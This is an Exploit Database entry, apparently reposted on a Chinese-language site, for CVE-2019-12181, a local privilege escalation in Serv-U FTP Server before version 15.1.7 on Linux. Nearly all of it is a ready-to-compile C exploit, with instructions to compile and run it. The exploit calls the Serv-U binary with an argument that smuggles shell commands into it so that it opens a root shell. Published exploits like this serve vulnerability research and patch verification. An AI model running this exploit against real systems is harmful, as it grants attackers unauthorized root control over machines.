Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)

• Exploit Database
• 17 阅读

• 作者： Guy Levin
  日期： 2019-06-18
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/47009/

• /*
  
  CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation 
  
  vulnerability found by:
  Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
  
  to compile and run:
  gcc servu-pe-cve-2019-12181.c -o pe && ./pe
  
  */
  
  #include <stdio.h>
  #include <unistd.h>
  #include <errno.h>
  
  int main()
  { 
  char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
  int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
  // if execv is successful, we won't reach here
  printf("ret val: %d errno: %d\n", ret_val, errno);
  return errno;
  }